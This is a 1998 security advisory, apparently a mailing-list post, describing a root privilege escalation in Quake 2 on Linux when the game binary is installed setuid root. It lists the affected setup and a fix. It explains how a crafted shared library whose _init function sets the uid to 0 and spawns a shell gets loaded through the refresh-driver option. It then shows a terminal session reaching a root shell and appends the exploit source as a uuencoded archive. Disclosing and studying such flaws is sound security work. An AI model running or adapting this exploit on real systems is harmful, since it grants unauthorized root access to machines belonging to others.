Quake 2 Linux

kevingeo@CRUZIO.COM
Mon, 26 Jan 1998 01:16:37 -0500

Vulnerable:
Anyone who made Quake2 setuid root in order to use the svgalib software refresh.

Solution:
chmod u-s quake2, and use ref_softx instead of ref_soft.
If you prefer console-based video, you could get GGI
(http://synergy.caltech.edu/~ggi/), and use KGI with the SVGAlib wrapper
(I haven't tried this).

Exploit:
Quake2 uses dlopen(3) to load its graphics code (which is in a seperate
shared library). dlopen calls the _init function (if applicable) before
it returns. Quake2 allows you to set which refresh driver to use on the
command line, and loads the .so file from the working directory.
The exploit is a shared library with one function; _init. It sets the uid
and gid to 0, and spawns a shell.

nop@chrome:~/ref_root> id
uid=501(nop) gid=100(users) groups=100(users)
nop@chrome:~/ref_root> make
gcc -O2 -pipe -o ref_root.o -c ref_root.c -fPIC
ld -m elf_i386 -shared -o ref_root.so -soname ref_root
/usr/lib/crtbeginS.o ref_root.o /usr/lib/crtendS.o
nop@chrome:~/ref_root> /usr/games/quake/quake2 +set vid_ref root
couldn't exec default.cfg
couldn't exec config.cfg
Console initialized.
------- Loading ref_root.so -------
sh-2.00#
sh-2.00# id
uid=0(root) gid=0(root) groups=100(users)
sh-2.00#

exploit code follows.
begin 644 ref_root.tgz
M'XL(`/TBS#0``^W534_C,!`&X%[K7_$*+FW5$"<IH2V[7#BL5K`+$N*T0E7J
M3!.+X)1\(!#BOZ_3!5K0"D[E2_-<8L],;"?1*+^B<YKIC%IKY$D9#@9HH2&?
M7:T@#(%P$`;2V[$`3X8R:$&N\U`/ZK**"J!5Y'GU4MUK^4\JRK(Q"II-FN=#
MIJ="/,S&$.U$*3A'/IRYGA.<_+%T*X>CEC-;-3O^N0\A[!+CU2JW+@O7!EU5
M5&3BDV>A*27:V*!H9S&<"U`VF^A@&,(ITZB@^,F>I=VTS$UT0<LC_V^QE_<7
M0KSW6_\XEE]P?7N\VO_;P7W_^](?2-O_GMS9YOY_"VYOV4J=R]K^#7S0]3S+
M==6%RN<WA4Y2FU)=>*/1$`=TI0U^4%XDA)XKQ*8V*JMCPK?:Z+**M]*]E9@-
MV-YK8D*;"A-M=-7IXE9`V?9&KTS_^&>[0L`.Y!F^8\.=:N.6Z<;N(N8UL=^G
MAX?-E*I:QQW9_3=.5L;TF*!K4E?462S7MROT%W?;S!TW/6.,,<888XPQQAAC
3C#'&&&.,,<:^IK\_JS?9`"@``%?4
`
end